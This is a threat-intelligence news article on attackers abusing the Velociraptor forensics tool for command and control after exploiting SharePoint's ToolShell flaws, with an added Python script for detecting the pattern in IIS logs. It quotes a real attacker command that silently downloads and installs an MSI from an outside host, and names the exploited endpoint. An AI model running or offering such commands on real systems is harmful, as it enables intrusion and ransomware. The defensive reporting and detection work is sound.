Hackers Leverage Velociraptor DFIR Tool for Stealthy C2 & Ransomware Delivery
Legitimate administrative tools are increasingly becoming the weapon of choice for sophisticated threat actors aiming to blend in with normal network activity.
A recent campaign has highlighted this dangerous trend, where attackers are weaponizing Velociraptor, a widely respected Digital Forensics and Incident Response (DFIR) tool.
By deploying this software, adversaries effectively establish stealthy Command and Control (C2) channels, allowing them to execute arbitrary commands and maintain persistent access to compromised environments without triggering traditional security alarms.
The attacks, observed throughout late 2025, leverage critical vulnerabilities in widely used enterprise infrastructure, specifically targeting Windows Server Update Services (WSUS) and Microsoft SharePoint.
Once inside, the actors deploy Velociraptor to facilitate lateral movement and, in confirmed cases, deliver the Warlock ransomware.
This dual-use strategy complicates detection, as the presence of forensic tools often signals remediation rather than active compromise.
Huntress security analysts identified this evolving tradecraft after investigating three distinct incidents between September and November.
Their research linked specific indicators, such as the hostname DESKTOP-C1N9M, to the financially motivated threat cluster Storm-2603.
The attackers demonstrated a high level of operational security, utilizing Cloudflare tunnels and digitally signed binaries to bypass endpoint defenses and evade network blocklists.
Exploiting SharePoint for Stealthy Access
The infection chain prominently features the exploitation of the “ToolShell” vulnerability chain in Microsoft SharePoint.
Attackers first bypass authentication using CVE-2025-49706 by sending specially crafted HTTP POST requests to /_layouts/15/ToolPane.aspx. Following this, they chain a secondary remote code execution vulnerability (CVE-2025-49704) to modify default files like start.aspx into malicious web shells.
IIS Access Logs for SharePoint Server (Source – Huntress)
The IIS access logs above show the suspicious, unauthenticated requests to pages under the /_layouts/15/ directory.
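A defender-side check for the request pattern described above, added here as an example rather than code from Huntress or the article: it parses IIS W3C access-log lines (the log lines below are constructed samples), flags any POST to ToolPane.aspx, and then flags follow-up requests from the same client to other /_layouts/15/ pages, since that is where start.aspx was turned into a web shell. Field names follow the standard W3C header; the column set is an assumption.

```python
# Added example (not from the Huntress report): flag ToolShell-pattern requests
# in IIS W3C access logs. The log text below is constructed sample data.
from typing import Dict, List, Tuple

SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2025-10-02 03:14:07 10.0.0.5 GET /_layouts/15/start.aspx - 443 jdoe 10.0.0.23 Mozilla/5.0 200
2025-10-02 03:15:41 10.0.0.5 POST /_layouts/15/ToolPane.aspx - 443 - 203.0.113.9 Mozilla/5.0 200
2025-10-02 03:15:42 10.0.0.5 POST /_layouts/15/ToolPane.aspx - 443 - 203.0.113.9 Mozilla/5.0 200
2025-10-02 03:16:05 10.0.0.5 GET /_layouts/15/start.aspx - 443 - 203.0.113.9 Mozilla/5.0 200
"""

TOOLPANE = "/_layouts/15/toolpane.aspx"  # target of the CVE-2025-49706 auth bypass
LAYOUTS = "/_layouts/15/"                # directory where start.aspx became a web shell


def parse_iis_log(text: str) -> List[Dict[str, str]]:
    """Parse W3C extended log text: '#Fields:' names the columns, other '#' lines are skipped."""
    fields: List[str] = []
    records: List[Dict[str, str]] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            values = line.split()
            if fields and len(values) == len(fields):
                records.append(dict(zip(fields, values)))
    return records


def find_toolshell_activity(records: List[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """Return (client_ip, uri_stem, reason) for each request matching the two-stage chain:
    a POST to ToolPane.aspx, then later /_layouts/15/ requests from that same client."""
    hits: List[Tuple[str, str, str]] = []
    suspects = set()  # client IPs that already POSTed to ToolPane.aspx
    for r in records:
        ip, method, stem = r.get("c-ip", "-"), r.get("cs-method", ""), r.get("cs-uri-stem", "")
        lower = stem.lower()
        if method == "POST" and lower == TOOLPANE:
            suspects.add(ip)
            hits.append((ip, stem, "POST to ToolPane.aspx (ToolShell auth-bypass pattern)"))
        elif ip in suspects and lower.startswith(LAYOUTS):
            hits.append((ip, stem, "follow-up /_layouts/15/ request from ToolPane.aspx client"))
    return hits
```

Run `find_toolshell_activity(parse_iis_log(SAMPLE_LOG))` to list the three flagged requests; the legitimate GET from 10.0.0.23 is not reported.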
Once the web shell is active, the threat actors execute commands to download and install Velociraptor via Windows Installer. A typical command observed in these attacks is:
msiexec /q /i https://royal-boat-bf05.qgtxtebl.workers.dev/v3.msi
This installation registers Velociraptor as a Windows service, ensuring persistence across reboots; the Autoruns output below shows the service entry that was created.
Autorun created for Velociraptor to run as a Windows service (Source – Huntress)
To further entrench their position, the attackers use the compromised Velociraptor instance to run Base64 encoded PowerShell commands.
These scripts download Visual Studio Code (code.exe) to create outbound tunnels, effectively masking their malicious traffic within legitimate development activity.
VS Code logs for tunnel creation (Source – Huntress)
The VS Code logs highlight the events generated during this tunnel-creation process, showing how the actors pivot from forensic tool abuse to complete network domination.